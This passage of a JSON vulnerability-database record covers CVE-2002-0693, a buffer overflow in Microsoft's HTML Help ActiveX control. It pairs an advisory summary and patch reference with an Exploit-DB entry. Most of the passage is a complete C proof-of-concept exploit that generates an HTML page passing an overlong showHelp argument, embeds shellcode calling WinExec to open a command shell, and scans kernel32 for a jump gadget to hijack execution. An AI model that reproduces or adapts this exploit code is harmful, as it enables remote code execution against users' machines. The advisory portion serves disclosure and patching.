This can be exploited by using a long parameter to the \"Alink\" function or a script containing a long argument to the \"showHelp\" function.\n\n## Technical Description\nHTML Help ActiveX control ships as part of Microsoft HTML Help, and is designed to work with Internet Explorer to provide functionality for help systems.\n## Solution Description\nCurrently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch (Q323255) to address this vulnerability.\n\n## Short Description\nMicrosoft Windows HTML Help ActiveX Control contains a flaw that allows remote attackers to execute arbitrary code. The flaw occurs due to an unchecked buffer in the hhctrl.ocx file. This can be exploited by using a long parameter to the \"Alink\" function or a script containing a long argument to the \"showHelp\" function.\n\n## References:\nVendor Specific Solution URL: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=40213\nMicrosoft Security Bulletin: MS02-055\nMail List Post: http://marc.theaimsgroup.com/?l=bugtraq&m=103419115517344&w=2\nISS X-Force ID: 10253\n[CVE-2002-0693](https://vulners.com/cve/CVE-2002-0693)\nBugtraq ID: 5874\n", "modified": "2002-10-03T00:00:00", "published": "2002-10-03T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:2992", "id": "OSVDB:2992", "title": "Microsoft IE HTML Help ActiveX Control alink and showHelp Overflow", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-02T17:32:14", "description": "MS Windows XP/2000/NT 4 Help Facility ActiveX Control Buffer Overflow. CVE-2002-0693. 
Remote exploit for windows platform", "published": "2002-10-07T00:00:00", "type": "exploitdb", "title": "Microsoft Windows 2000/XP/NT 4 - Help Facility ActiveX Control Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2002-0693"], "modified": "2002-10-07T00:00:00", "id": "EDB-ID:21902", "href": "https://www.exploit-db.com/exploits/21902/", "sourceData": "source: http://www.securityfocus.com/bid/5874/info\r\n\r\nThe ActiveX control that provides much of the functionality for the Windows Help Center contains an unchecked buffer. Successful exploitation could result in execution of arbitrary code in the security context of the current user.\r\n\r\n/*\r\nBy ipxodi@whitecell.org 10.07.2002\r\n\r\nprove of concept code of Windows Help buffer overflow.\r\nBug discovered by \r\nFor tech detail see \"Thor Larholm security advisory TL#004\".\r\nTo Use:\r\ncl ex.c\r\nRun as:\r\nex > ex.htm\r\nstart ex.htm (be sure to set iexplore as your default htm viewer.)\r\nYou will get a cmd shell.\r\n\r\nTested on IE 5.5, IE5.5 SP2, IE 6.0.\r\nother version untested.\r\n*/\r\n\r\n#include <windows.h>\r\n#include <stdio.h>\r\n\r\n\r\nchar shellcode[] = \"\\x55\\x8B\\xEC\\x33\\xFF\\x57\\xC6\\x45\\xFC\\x63\\xC6\\x45\\xFD\\x6D\\xC6\\x45\\xFE\\x64\\x57\\xC6\\x45\\xF8\\x03\" \"\\x80\\x6D\\xF8\\x50\" \r\n\t\t\"\\x8D\\x45\\xFC\\x50\\x90\\xB8\" \"EXEC\" \"\\xFF\\xD0\\x33\\xC0\\x50\\x90\\xB8\" \"EXIT\" \"\\xFF\\xD0\\xC3\";\r\n\r\nchar shellcode_encode[] = \"\\x55\\x8B\\xEC\\x33\\xFF\\x57\\xC6\\x45\\xFC\\x63\\xC6\\x45\\xFD\\x6D\\xC6\\x45\\xFE\\x64\\x57\\xC6\\x45\\xF8\\x53\" \"\\x80\\x6D\\xF8\\x50\" \r\n\t\t\"\\x8D\\x45\\xFC\\x50\\x90\\xB8\" \"EXEC\" \"\\x2C\\x78\" \"\\xFF\\xD0\" \"\\x41\\x33\\xC0\\x50\\x90\\xB8\"\"EXIT\" \"\\x2C\\x78\" \"\\xFF\\xD0\\xC3\";\r\n\r\nvoid EncodeFuncAddr(char * shellcode,DWORD addr,char * pattern)\r\n{\r\n\tunsigned char * p ;\r\n\tp = strstr(shellcode,pattern);\r\n\tif(p)\t{\r\n\t\tif( *(p+4) == '\\xFF' )\t\r\n\t\t\tmemcpy(p,&addr,4);\r\n\t\telse 
{\r\n\t\t\tif((addr & 0xFF) > 0x80)\t{\r\n\t\t\t\tmemcpy(p,&addr,4);\t\r\n\t\t\t\t*(p+4) = 0x90;\r\n\t\t\t\t*(p+5) = 0x90;\r\n\t\t\t}else\t{\r\n\t\t\t\taddr += 0x78;\r\n\t\t\t\tmemcpy(p,&addr,4);\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n}\r\n\r\nint ModifyFuncAddr(char * shellcode)\r\n{\r\n\tchar * temp=\"0123456789ABCDEF\";\r\n\tHMODULE hdl;\r\n\tunsigned char * p ;\r\n\tDWORD pAddr_WinExec ,pAddr_Exit ;\r\n\r\n\thdl = LoadLibrary(\"kernel32.dll\");\r\n\tpAddr_WinExec = GetProcAddress(hdl,\"WinExec\");\r\n\tpAddr_Exit = GetProcAddress(hdl,\"ExitProcess\"); \r\n\tfprintf(stderr,\"Find WinExec at Address %x, ExitProcess at Address %x\\n\",pAddr_WinExec,pAddr_Exit);\r\n\tEncodeFuncAddr(shellcode,pAddr_WinExec,\"EXEC\");\r\n\tEncodeFuncAddr(shellcode,pAddr_Exit,\"EXIT\");\r\n}\r\n\r\n\r\nvoid Validate(char * shellcode)\r\n{\r\n\tunsigned char *p, *foo = \"\\\\\\/:*?\\\"<>|\";\r\n\tfor(;*foo;foo++)\t{\r\n\t\tp = strchr(shellcode,*foo);\r\n\t\tif(p)\t{\r\n\t\t\tfprintf(stderr,\"ERROR:ShellCode Contains Invalid Char For File name: %s\\n\",p);\r\n\t\t}\r\n\t}\r\n}\r\n\r\n#define Valid(c)\t(c>0x30)\r\nint FindCode(char * code)\r\n{\r\n\tDWORD addr;\r\n\tunsigned char * p = (unsigned char * )LoadLibrary(\"kernel32.dll\");\r\n\r\n\tfor(;p < 0x77f00000;p++)\r\n\t\tif(memcmp(p,code,2)==0)\t{\r\n\t\t\tfprintf(stderr,\"Find Code at Address %x\\n\",p);\r\n\t\t\taddr = (DWORD) p;\r\n\t\t\tif( (addr &0xFF )>0x30 && ((addr>>8)&0xFF)>0x30&& ((addr>>16)&0xFF)>0x30 && ((addr>>24)&0xFF)>0x30 )\r\n\t\t\t\treturn p;\r\n\t\t}\r\n\treturn 0;\r\n}\r\nint main(int argc, char ** argv)\r\n{\r\n\tchar * prefix = \"<script type=\\\"text/javascript\\\">showHelp(\\\"\";\r\n\tchar *postfix = \"\\\");</script>\";\r\n\tchar buff[1024];\r\n\tint mode = 2;\r\n\tchar * pCode = buff, *shell;\r\n\tDWORD addr;\r\n\tint offset = 784;\r\n\t\r\n\tif(argc > 3 )\t{\r\n\t\tprintf(\"Usage: %s [mode] [offset]\",argv[0]);\r\n\t\tprintf(\"Normal: %s 1 784\",argv[0]);\r\n\t\tprintf(\"Advanc: %s 2 
784\",argv[0]);\r\n\t\texit(0);\r\n\t}else if(argc == 3 )\t{\r\n\t\toffset = atoi(argv[2]);\r\n\t\tmode = atoi(argv[1]);\r\n\t};\r\n\tfprintf(stderr,\"Mode %d, Using Offset %d\\n\",mode,offset);\r\n\tmemset(buff,0x41,1023);\r\n\t\r\n\tmemcpy(pCode, \"A:\\\\\\xC0\",4);\t//cmp al,al as a nop.\r\n\t\r\n\tswitch(mode)\t{\r\n\t\tcase 1: shell = shellcode; break;\r\n\t\tcase 2: shell = shellcode_encode;break;\r\n\t\tcase 3: {\r\n\t\t\t\tsprintf(buff +offset, \"abcd\");\r\n\t\t\t\tprintf(\"%s%s%s\",prefix,buff,postfix);\r\n\t\t\t\treturn ;\r\n\t\t\t\t}\r\n\t}\r\n\tModifyFuncAddr(shell);\r\n\tValidate(shell);\r\n\tmemcpy(pCode+0x10,shell,strlen(shell));\r\n\tpCode = buff + offset;\r\n\taddr = FindCode(\"\\xFF\\xE7\");\t// jmp edi\r\n\t*(int*)pCode = addr ? addr : 0x77e79d02;\r\n\t*(pCode+4)=0;\r\n\tprintf(\"%s%s%s\",prefix,buff,postfix);\r\n}\r\n\t\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/21902/"}]}